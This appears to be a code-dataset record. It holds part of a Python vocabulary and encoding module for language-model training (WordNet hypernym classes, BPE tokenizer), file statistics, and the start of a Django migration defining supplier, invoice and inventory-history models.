symbols = self.tokenize(
line, add_eos=add_eos, add_sent_eos=sent_eos, char_level=char_level)
temp_counter.update(symbols)
self.cl_root_tokens = list((temp_counter-self.counter).keys())
self.cl_leaf_tokens = list((self.counter-temp_counter).keys())
self.counter = self.counter | temp_counter
def _build_from_file(self, vocab_file):
self.idx2sym = []
self.sym2idx = OrderedDict()
with open(vocab_file, 'r', encoding='utf-8') as f:
for line in f:
symb = line.strip().split()[0]
self.add_symbol(symb)
self.unk_idx = self.sym2idx['<UNK>']
def build_vocab(self):
if self.vocab_file:
print('building vocab from {}'.format(self.vocab_file))
self._build_from_file(self.vocab_file)
print('final vocab size {}'.format(len(self)))
else:
print('building vocab with min_freq={}, max_size={}'.format(
self.min_freq, self.max_size))
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.special:
self.add_special(sym)
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq:
break
self.add_symbol(sym)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
if self.cl_root_tokens:
self.cl_root_tokens = [self.get_idx(
sym) for sym in self.cl_root_tokens]
self.cl_leaf_tokens = [self.get_idx(
sym) for sym in self.cl_leaf_tokens]
def build_vocab_hypernym_last(self):
if self.vocab_file:
print('building vocab from {}'.format(self.vocab_file))
self._build_from_file(self.vocab_file)
print('final vocab size {}'.format(len(self)))
else:
print('building vocab with min_freq={}, max_size={}'.format(
self.min_freq, self.max_size))
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.special:
self.add_special(sym)
hypernym_tokens = self.cl_root_tokens
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq:
break
if sym in hypernym_tokens:
continue
self.add_symbol(sym)
for h_token in hypernym_tokens:
self.add_symbol(h_token)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
if self.cl_root_tokens:
self.cl_root_tokens = [self.get_idx(
sym) for sym in self.cl_root_tokens]
self.cl_leaf_tokens = [self.get_idx(
sym) for sym in self.cl_leaf_tokens]
def build_vocab_with_cl_order(self):
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.cl_root_tokens:
self.add_symbol(sym)
for sym in self.special:
self.add_special(sym)
add_leaf_flag = True
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq:
break
if add_leaf_flag and len(self.idx2sym) == 20000:
for _sym in self.cl_leaf_tokens:
self.add_symbol(_sym)
add_leaf_flag = False
if add_leaf_flag and sym in self.cl_leaf_tokens:
continue
self.add_symbol(sym)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
if self.cl_root_tokens:
self.cl_root_tokens = [self.get_idx(
sym) for sym in self.cl_root_tokens]
self.cl_leaf_tokens = [self.get_idx(
sym) for sym in self.cl_leaf_tokens]
def get_wn_replaced_dict(self, synset_layer=5, ignore_freqency_threshold=6000, replaced_with_new_symbol=True,
min_tokens_per_hypernym=0):
word2class = {}
class2words = defaultdict(list)
for k, cnt in self.counter.most_common(self.max_size):
if cnt >= ignore_freqency_threshold:
continue
if cnt < self.min_freq:
break
continue_for_k = True
for synset in wn.synsets(k):
paths = synset.hypernym_paths()
for path in paths:
if len(path) < synset_layer+1:
continue
else:
hypernym_name = path[synset_layer].name()
if '.n.' not in hypernym_name:
continue
if not replaced_with_new_symbol:
hypernym_name = hypernym_name.split('.')[0].split('')
class2words[path[synset_layer].name()].append(
k)
word2class[k] = path[synset_layer].name()
# self.counter.update([path[synset_layer].name()]*cnt)
self.counter.update([path[synset_layer].name()])
continue_for_k = False
break
if not continue_for_k:
break
for k, v in class2words.items():
if len(v) >= min_tokens_per_hypernym:
self.class2words[k].extend(v)
for token in v:
self.word2class[token] = k
else:
self.counter[k]=0
for k, v in self.class2words.items():
self.cl_root_tokens.append(k)
self.cl_leaf_tokens.extend(v)
self.cl_leaf_tokens = list(set(self.cl_leaf_tokens))
# self.vocab.cl_root_tokens = list(self.vocab.class2words.keys())
# self.vocab.cl_leaf_tokens = list(self.vocab.word2class.keys())
def get_wn_replaced_dict_list(self, min_synset_layer=4, max_synset_layer=5, ignore_freqency_threshold=6000, replaced_with_new_symbol=True):
for k, cnt in self.counter.most_common(self.max_size):
if cnt >= ignore_freqency_threshold:
continue
if cnt < self.min_freq:
break
continue_for_k = True
for synset in wn.synsets(k):
paths = synset.hypernym_paths()
for path in paths:
if len(path) < max_synset_layer+1:
continue
else:
hypernym_name = path[max_synset_layer].name()
if '.n.' not in hypernym_name:
continue
for synset_layer in range(min_synset_layer, max_synset_layer+1):
hypernym_name = path[synset_layer].name()
self.class2words[hypernym_name].append(
k)
self.word2class_dict[synset_layer][k] = hypernym_name
self.counter.update([hypernym_name])
continue_for_k = False
break
if not continue_for_k:
break
for k, v in self.class2words.items():
self.cl_root_tokens.append(k)
self.cl_leaf_tokens.extend(v)
self.cl_leaf_tokens = list(set(self.cl_leaf_tokens))
# self.vocab.cl_root_tokens = list(self.vocab.class2words.keys())
# self.vocab.cl_leaf_tokens = list(self.vocab.word2class.keys())
def encode_file(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
symbols = self.tokenize(line, add_eos=add_eos,
add_double_eos=add_double_eos, add_sent_eos=add_sent_eos)
encoded.append(self.convert_to_tensor(symbols))
if ordered:
encoded = torch.cat(encoded)
return encoded
def encode_file_plus(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
encoded_cl = []
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
symbols = self.tokenize(line, add_eos=add_eos,
add_double_eos=add_double_eos, add_sent_eos=add_sent_eos)
cl_symbols = [self.word2class[x]
if x in self.word2class else x for x in symbols]
encoded.append(self.convert_to_tensor(symbols))
encoded_cl.append(self.convert_to_tensor(cl_symbols))
if ordered:
encoded = torch.cat(encoded)
encoded_cl = torch.cat(encoded_cl)
return encoded, encoded_cl
def encode_sents(self, sents, ordered=False, verbose=False):
if verbose:
print('encoding {} sents ...'.format(len(sents)))
encoded = []
for idx, symbols in enumerate(sents):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
encoded.append(self.convert_to_tensor(symbols))
if ordered:
encoded = torch.cat(encoded)
return encoded
def add_special(self, sym):
if sym not in self.sym2idx:
self.idx2sym.append(sym)
self.sym2idx[sym] = len(self.idx2sym) - 1
setattr(self, '{}_idx'.format(sym.strip('<>')), self.sym2idx[sym])
def add_symbol(self, sym):
if sym not in self.sym2idx:
self.idx2sym.append(sym)
self.sym2idx[sym] = len(self.idx2sym) - 1
def get_sym(self, idx):
assert 0 <= idx < len(self), 'Index {} out of range'.format(idx)
return self.idx2sym[idx]
def get_idx(self, sym):
if sym in self.sym2idx:
return self.sym2idx[sym]
else:
# print('encounter unk {}'.format(sym))
assert '<eos>' not in sym
assert hasattr(self, 'unk_idx')
return self.sym2idx.get(sym, self.unk_idx)
def get_symbols(self, indices):
return [self.get_sym(idx) for idx in indices]
def get_indices(self, symbols):
return [self.get_idx(sym) for sym in symbols]
def convert_to_tensor(self, symbols):
return torch.LongTensor(self.get_indices(symbols))
def convert_to_sent(self, indices, exclude=None):
if exclude is None:
return ' '.join([self.get_sym(idx) for idx in indices])
else:
return ' '.join([self.get_sym(idx) for idx in indices if idx not in exclude])
def __len__(self):
return len(self.idx2sym)
class SegaVocab(Vocab):
def __init__(self, special=[], min_freq=0, max_size=None, lower_case=True,
delimiter=None, vocab_file=None):
super().__init__(special, min_freq, max_size, lower_case,
delimiter, vocab_file)
def encode_file(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False, char_level=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
p = []
s = []
t = []
index_p = 0
index_s = 0
index_t = 0
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
if line.strip() == '':
continue
sents = nltk.tokenize.sent_tokenize(line)
symbols = []
para_pos = []
sent_pos = []
token_pos = []
for i, sent in enumerate(sents):
if i == len(sents)-1:
sent_symbol = self.tokenize(sent, add_eos=add_eos, add_double_eos=add_double_eos,
add_sent_eos=add_sent_eos, char_level=char_level)
else:
sent_symbol = self.tokenize(
sent, add_sent_eos=add_sent_eos, char_level=char_level)
symbols.extend(sent_symbol)
para_pos.extend([index_p]*len(sent_symbol))
sent_pos.extend([index_s]*len(sent_symbol))
token_pos.extend(range(index_t, index_t+len(sent_symbol)))
index_s += 1
index_t += len(sent_symbol)
index_p += 1
# symbols = self.tokenize(line, add_eos=add_eos,
# add_double_eos=add_double_eos)
encoded.append(self.convert_to_tensor(symbols))
p.append(torch.LongTensor(para_pos))
s.append(torch.LongTensor(sent_pos))
t.append(torch.LongTensor(token_pos))
if ordered:
encoded = torch.cat(encoded)
p = torch.cat(p)
s = torch.cat(s)
t = torch.cat(t)
return (encoded, p, s, t)
def encode_file_plus(self, path, ordered=False, verbose=False, add_eos=True,
add_double_eos=False, add_sent_eos=False, char_level=False):
if verbose:
print('encoding file {} ...'.format(path))
assert os.path.exists(path)
encoded = []
encoded_cl = []
p = []
s = []
t = []
index_p = 0
index_s = 0
index_t = 0
with open(path, 'r', encoding='utf-8') as f:
for idx, line in enumerate(f):
if verbose and idx > 0 and idx % 500000 == 0:
print(' line {}'.format(idx))
if line.strip() == '':
continue
sents = nltk.tokenize.sent_tokenize(line)
symbols = []
para_pos = []
sent_pos = []
token_pos = []
for i, sent in enumerate(sents):
if i == len(sents)-1:
sent_symbol = self.tokenize(sent, add_eos=add_eos, add_double_eos=add_double_eos,
add_sent_eos=add_sent_eos, char_level=char_level)
else:
sent_symbol = self.tokenize(
sent, add_sent_eos=add_sent_eos, char_level=char_level)
symbols.extend(sent_symbol)
para_pos.extend([index_p]*len(sent_symbol))
sent_pos.extend([index_s]*len(sent_symbol))
token_pos.extend(range(index_t, index_t+len(sent_symbol)))
index_s += 1
index_t += len(sent_symbol)
cl_symbols = [self.word2class[x]
if x in self.word2class else x for x in symbols]
index_p += 1
# symbols = self.tokenize(line, add_eos=add_eos,
# add_double_eos=add_double_eos)
encoded_cl.append(self.convert_to_tensor(cl_symbols))
encoded.append(self.convert_to_tensor(symbols))
p.append(torch.LongTensor(para_pos))
s.append(torch.LongTensor(sent_pos))
t.append(torch.LongTensor(token_pos))
if ordered:
encoded = torch.cat(encoded)
encoded_cl = torch.cat(encoded_cl)
p = torch.cat(p)
s = torch.cat(s)
t = torch.cat(t)
return (encoded, p, s, t), encoded_cl
class SegaBPEVocab(SegaVocab):
def __init__(self, special=[], min_freq=1, max_size=None, lower_case=True,
delimiter=None, vocab_file=None, tokenizer_path=None):
self.counter = Counter()
self.special = special
self.min_freq = min_freq
self.max_size = max_size
self.lower_case = lower_case
self.delimiter = delimiter
self.vocab_file = vocab_file
self.cl_root_tokens = []
self.cl_leaf_tokens = []
self.word2class = {}
self.class2words = defaultdict(list)
self.word2class_dict = defaultdict(dict)
self.tokenizer = Tokenizer.from_file(tokenizer_path)
self.tokenizer.add_special_tokens(self.special)
self.unk_idx = self.tokenizer.get_vocab()['<unk>']
def tokenize(self, line, add_eos=False, add_double_eos=False, add_sent_eos=False, char_level=False):
line = line.strip()
if char_level:
line = ' '.join([str(ord(c)) for c in line])
# convert to lower case
if self.lower_case:
line = line.lower()
symbols = self.tokenizer.encode(
line).tokens
if add_sent_eos:
symbols = symbols + ['<sent_eos>']
if add_double_eos: # lm1b
return ['<S>'] + symbols + ['<S>']
elif add_eos:
return symbols + ['<eos>']
else:
return symbols
def get_wn_replaced_dict(self, synset_layer=5, ignore_freqency_threshold=3000, replaced_with_new_symbol=True,
min_tokens_per_hypernym=0):
word2class = {}
class2words = defaultdict(list)
for k_ori, cnt in self.counter.most_common(self.max_size):
if cnt >= ignore_freqency_threshold:
continue
if cnt < self.min_freq:
break
if '▁' not in k_ori:
continue
else:
k = k_ori.strip('▁')
continue_for_k = True
for synset in wn.synsets(k):
paths = synset.hypernym_paths()
for path in paths:
if len(path) < synset_layer+1:
continue
else:
hypernym_name = path[synset_layer].name()
if '.n.' not in hypernym_name:
continue
if not replaced_with_new_symbol:
hypernym_name = hypernym_name.split('.')[0].split('')
class2words[path[synset_layer].name()].append(
k_ori)
word2class[k_ori] = path[synset_layer].name()
# self.counter.update([path[synset_layer].name()]*cnt)
self.counter.update([path[synset_layer].name()])
continue_for_k = False
break
if not continue_for_k:
break
for k, v in class2words.items():
if len(v) >= min_tokens_per_hypernym:
self.class2words[k].extend(v)
for token in v:
self.word2class[token] = k
else:
self.counter[k]=0
for k, v in self.class2words.items():
self.cl_root_tokens.append(k)
self.cl_leaf_tokens.extend(v)
self.cl_leaf_tokens = list(set(self.cl_leaf_tokens))
self.tokenizer.add_special_tokens(self.cl_root_tokens)
# self.vocab.cl_root_tokens = list(self.vocab.class2words.keys())
# self.vocab.cl_leaf_tokens = list(self.vocab.word2class.keys()) | 41.368984 | 143 | 0.534083 | 2,743 | 23,208 | 4.294933 | 0.06307 | 0.019353 | 0.023428 | 0.027162 | 0.838808 | 0.82285 | 0.802309 | 0.796707 | 0.781852 | 0.768271 | 0 | 0.01185 | 0.367287 | 23,208 | 561 | 144 | 41.368984 | 0.790316 | 0.033652 | 0 | 0.790224 | 0 | 0 | 0.03088 | 0 | 0 | 0 | 0 | 0 | 0.016293 | 1 | 0.057026 | false | 0 | 0.01222 | 0.008147 | 0.118126 | 0.04888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
034f9f95d1e10801588612245287eef6ace62e4b | 42,300 | py | Python | purchasing/migrations/0001_initial.py | mark-bondo/moondance | 3347c3fb8ac3e40a5c66b61a21cfb562841531ba | [
"MIT"
] | null | null | null | purchasing/migrations/0001_initial.py | mark-bondo/moondance | 3347c3fb8ac3e40a5c66b61a21cfb562841531ba | [
"MIT"
] | null | null | null | purchasing/migrations/0001_initial.py | mark-bondo/moondance | 3347c3fb8ac3e40a5c66b61a21cfb562841531ba | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-05-31 14:58
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
("operations", "0001_initial"),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name="Supplier",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
(
"type",
models.CharField(
choices=[
("Distributor", "Distributor"),
("Manufacturer", "Manufacturer"),
],
default="Manufacturer",
max_length=200,
),
),
("name", models.CharField(max_length=200, unique=True)),
(
"contact_name",
models.CharField(blank=True, max_length=200, null=True),
),
(
"contact_email",
models.CharField(blank=True, max_length=200, null=True),
),
(
"street_address",
models.CharField(blank=True, max_length=200, null=True),
),
("city", models.CharField(blank=True, max_length=200, null=True)),
("state", models.CharField(blank=True, max_length=200, null=True)),
(
"postal_code",
models.CharField(blank=True, max_length=200, null=True),
),
(
"country",
models.CharField(
blank=True, default="United States", max_length=200, null=True
),
),
("supplier_website", models.URLField(blank=True, null=True)),
("notes", models.TextField(blank=True, null=True)),
(
"phone_number",
models.CharField(blank=True, max_length=50, null=True),
),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
],
options={
"verbose_name": "Supplier",
"verbose_name_plural": "Suppliers",
"ordering": ("name",),
},
),
migrations.CreateModel(
name="Invoice",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
("invoice", models.CharField(blank=True, max_length=200, null=True)),
("order", models.CharField(blank=True, max_length=200, null=True)),
("date_invoiced", models.DateField(default=django.utils.timezone.now)),
(
"freight_charges",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="invoice_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"supplier",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
related_name="Invoice_supplier_fk",
to="purchasing.supplier",
verbose_name="Invoicing Supplier",
),
),
],
options={
"verbose_name": "Inventory Receipt",
"verbose_name_plural": "Inventory Receipts",
"ordering": ("-date_invoiced", "invoice"),
},
),
migrations.CreateModel(
name="HistoricalSupplier_Product",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
("supplier_sku", models.CharField(max_length=200)),
("supplier_sku_description", models.CharField(max_length=200)),
("supplier_sku_link", models.URLField(blank=True, null=True)),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"sku",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="operations.product",
),
),
(
"supplier",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.supplier",
),
),
],
options={
"verbose_name": "historical Supplier Product",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalSupplier",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
(
"type",
models.CharField(
choices=[
("Distributor", "Distributor"),
("Manufacturer", "Manufacturer"),
],
default="Manufacturer",
max_length=200,
),
),
("name", models.CharField(db_index=True, max_length=200)),
(
"contact_name",
models.CharField(blank=True, max_length=200, null=True),
),
(
"contact_email",
models.CharField(blank=True, max_length=200, null=True),
),
(
"street_address",
models.CharField(blank=True, max_length=200, null=True),
),
("city", models.CharField(blank=True, max_length=200, null=True)),
("state", models.CharField(blank=True, max_length=200, null=True)),
(
"postal_code",
models.CharField(blank=True, max_length=200, null=True),
),
(
"country",
models.CharField(
blank=True, default="United States", max_length=200, null=True
),
),
("supplier_website", models.URLField(blank=True, null=True)),
("notes", models.TextField(blank=True, null=True)),
(
"phone_number",
models.CharField(blank=True, max_length=50, null=True),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
],
options={
"verbose_name": "historical Supplier",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalInvoice_Line",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
(
"unit_of_measure",
models.CharField(
choices=[
("grams", "grams"),
("oz", "oz"),
("lbs", "lbs"),
("each", "each"),
("minutes", "minutes"),
],
max_length=200,
),
),
("quantity", models.DecimalField(decimal_places=2, max_digits=12)),
("total_cost", models.DecimalField(decimal_places=2, max_digits=12)),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"invoice",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.invoice",
),
),
(
"manufacturer",
models.ForeignKey(
blank=True,
db_constraint=False,
help_text="Only needs to be populated if the manufacturer is different than the invoicing supplier.",
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.supplier",
verbose_name="Manufacturer",
),
),
(
"sku",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="operations.product",
verbose_name="MoonDance SKU",
),
),
],
options={
"verbose_name": "historical Recipt Line",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalInvoice",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
("invoice", models.CharField(blank=True, max_length=200, null=True)),
("order", models.CharField(blank=True, max_length=200, null=True)),
("date_invoiced", models.DateField(default=django.utils.timezone.now)),
(
"freight_charges",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"supplier",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="purchasing.supplier",
verbose_name="Invoicing Supplier",
),
),
],
options={
"verbose_name": "historical Inventory Receipt",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="HistoricalInventory_Onhand",
fields=[
(
"id",
models.IntegerField(
auto_created=True, blank=True, db_index=True, verbose_name="ID"
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
blank=True, editable=False, verbose_name="Datetime Updated"
),
),
(
"location",
models.CharField(
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
verbose_name="Current Location",
),
),
(
"quantity_onhand",
models.DecimalField(decimal_places=2, max_digits=12),
),
(
"to_location",
models.CharField(
blank=True,
choices=[
("Bondo - Garage", "Bondo - Garage"),
("Bondo - 2nd Floor", "Bondo - 2nd Floor"),
("MoonDance - Workshop", "MoonDance - Workshop"),
(
"MoonDance - Fulfillment Center",
"MoonDance - Fulfillment Center",
),
],
max_length=200,
null=True,
verbose_name="Transfer To Location",
),
),
(
"transfer_quantity",
models.DecimalField(
blank=True, decimal_places=2, max_digits=12, null=True
),
),
("history_id", models.AutoField(primary_key=True, serialize=False)),
("history_date", models.DateTimeField()),
("history_change_reason", models.CharField(max_length=100, null=True)),
(
"history_type",
models.CharField(
choices=[("+", "Created"), ("~", "Changed"), ("-", "Deleted")],
max_length=1,
),
),
(
"_created_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
),
),
(
"history_user",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to=settings.AUTH_USER_MODEL,
),
),
(
"sku",
models.ForeignKey(
blank=True,
db_constraint=False,
null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="+",
to="operations.product",
),
),
],
options={
"verbose_name": "historical Inventory Onhand",
"ordering": ("-history_date", "-history_id"),
"get_latest_by": "history_date",
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name="Supplier_Product",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"_active",
models.BooleanField(default=True, verbose_name="Is Active"),
),
(
"_created",
models.DateTimeField(
auto_now_add=True, verbose_name="Datetime Created"
),
),
(
"_last_updated",
models.DateTimeField(
auto_now=True, verbose_name="Datetime Updated"
),
),
("supplier_sku", models.CharField(max_length=200)),
("supplier_sku_description", models.CharField(max_length=200)),
("supplier_sku_link", models.URLField(blank=True, null=True)),
(
"_created_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_product_created_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Created By",
),
),
(
"_last_updated_by",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="supplier_product_last_updated_by",
to=settings.AUTH_USER_MODEL,
verbose_name="Last Updated By",
